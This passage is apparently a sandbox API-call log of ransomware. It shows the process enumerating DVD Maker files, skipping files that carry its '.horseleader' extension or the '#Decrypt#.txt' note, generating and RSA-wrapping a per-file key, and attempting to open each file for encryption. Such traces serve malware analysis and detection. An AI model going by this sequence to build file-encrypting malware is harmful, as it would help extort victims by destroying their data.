dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.653] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.653] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\..") returned 62 [0251.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.654] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.654] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70562bb6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70562bb6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720x480blacksquare.png", cAlternateFileName="")) returned 1 [0251.654] lstrcmpiW (lpString1="720x480blacksquare.png", lpString2="Windows") returned -1 [0251.654] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png") returned 82 [0251.654] StrStrIW (lpFirst="720x480blacksquare.png", lpSrch=".horseleader") returned 0x0 [0251.654] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="#Decrypt#.txt") returned 1 [0251.654] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="_uninstalling_.png") returned 1 [0251.654] lstrlenW (lpString=".testttjffg") returned 11 [0251.654] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", lpSrch=".testttjffg") returned 0x0 [0251.654] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.655] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.656] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703015e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703015e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1168, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.656] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.656] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png") returned 82 [0251.656] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.656] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.656] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.656] lstrlenW (lpString=".testttjffg") returned 11 [0251.656] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.656] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.656] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.657] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dbda349, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIconSubpictur.png", cAlternateFileName="")) returned 1 [0251.657] lstrcmpiW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="Windows") returned -1 [0251.657] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png") returned 91 [0251.657] StrStrIW (lpFirst="NextMenuButtonIconSubpictur.png", lpSrch=".horseleader") returned 0x0 [0251.657] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="#Decrypt#.txt") returned 1 [0251.657] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="_uninstalling_.png") returned 1 [0251.657] lstrlenW (lpString=".testttjffg") returned 11 [0251.657] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", lpSrch=".testttjffg") returned 0x0 [0251.657] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.657] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.657] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.657] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70184844, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70184844, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc26605, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa942c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_loop.wmv", cAlternateFileName="")) returned 1 [0251.658] lstrcmpiW (lpString1="Notes_loop.wmv", lpString2="Windows") returned -1 [0251.658] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv") returned 74 [0251.658] StrStrIW (lpFirst="Notes_loop.wmv", lpSrch=".horseleader") returned 0x0 [0251.658] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.658] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0251.658] lstrlenW (lpString=".testttjffg") returned 11 [0251.658] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", lpSrch=".testttjffg") returned 0x0 [0251.658] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.658] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7021cdb8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7021cdb8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc728c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbebec, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0251.659] lstrcmpiW (lpString1="Notes_loop_PAL.wmv", lpString2="Windows") returned -1 [0251.659] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv") returned 78 [0251.659] StrStrIW (lpFirst="Notes_loop_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.659] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.659] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.659] lstrlenW (lpString=".testttjffg") returned 11 [0251.659] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.659] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.660] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11ad, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.660] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png") returned 84 [0251.660] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.660] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.660] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.660] lstrlenW (lpString=".testttjffg") returned 11 [0251.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.661] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbef, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIconSubpict.png", cAlternateFileName="")) returned 1 [0251.661] lstrcmpiW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="Windows") returned -1 [0251.661] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png") returned 91 [0251.661] StrStrIW (lpFirst="ParentMenuButtonIconSubpict.png", lpSrch=".horseleader") returned 0x0 [0251.661] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="#Decrypt#.txt") returned 1 [0251.661] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="_uninstalling_.png") returned 1 [0251.661] lstrlenW (lpString=".testttjffg") returned 11 [0251.661] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", lpSrch=".testttjffg") returned 0x0 [0251.661] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.661] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.662] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70053d5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70053d5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x629b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="performance.png", cAlternateFileName="")) returned 1 [0251.662] lstrcmpiW (lpString1="performance.png", lpString2="Windows") returned -1 [0251.662] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png") returned 75 [0251.662] StrStrIW (lpFirst="performance.png", lpSrch=".horseleader") returned 0x0 [0251.662] lstrcmpW (lpString1="performance.png", lpString2="#Decrypt#.txt") returned 1 [0251.662] lstrcmpW (lpString1="performance.png", lpString2="_uninstalling_.png") returned 1 [0251.662] lstrlenW (lpString=".testttjffg") returned 11 [0251.662] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", lpSrch=".testttjffg") returned 0x0 [0251.662] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.662] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.663] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700a0016, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700a0016, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Perf_Scenes_Mask1.png", cAlternateFileName="")) returned 1 [0251.663] lstrcmpiW (lpString1="Perf_Scenes_Mask1.png", lpString2="Windows") returned -1 [0251.663] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png") returned 81 [0251.663] StrStrIW (lpFirst="Perf_Scenes_Mask1.png", lpSrch=".horseleader") returned 0x0 [0251.663] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="#Decrypt#.txt") returned 1 [0251.663] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="_uninstalling_.png") returned 1 [0251.664] lstrlenW (lpString=".testttjffg") returned 11 [0251.664] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", lpSrch=".testttjffg") returned 0x0 [0251.664] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.664] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.664] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Perf_Scenes_Subpicture1.png", cAlternateFileName="")) returned 1 [0251.664] lstrcmpiW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="Windows") returned -1 [0251.664] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png") returned 87 [0251.664] StrStrIW (lpFirst="Perf_Scenes_Subpicture1.png", lpSrch=".horseleader") returned 0x0 [0251.664] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="#Decrypt#.txt") returned 1 [0251.664] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="_uninstalling_.png") returned 1 [0251.664] lstrlenW (lpString=".testttjffg") returned 11 [0251.664] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", lpSrch=".testttjffg") returned 0x0 [0251.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.665] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70269072, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70269072, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.665] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.665] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 86 [0251.665] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.665] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.665] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.665] lstrlenW (lpString=".testttjffg") returned 11 [0251.665] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.666] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x702b532c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x702b532c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIconSubpi.png", cAlternateFileName="")) returned 1 [0251.666] lstrcmpiW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="Windows") returned -1 [0251.666] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png") returned 91 [0251.666] StrStrIW (lpFirst="PreviousMenuButtonIconSubpi.png", lpSrch=".horseleader") returned 0x0 [0251.666] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="#Decrypt#.txt") returned 1 [0251.666] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="_uninstalling_.png") returned 1 [0251.666] lstrlenW (lpString=".testttjffg") returned 11 [0251.666] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", lpSrch=".testttjffg") returned 0x0 [0251.666] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.666] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.667] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 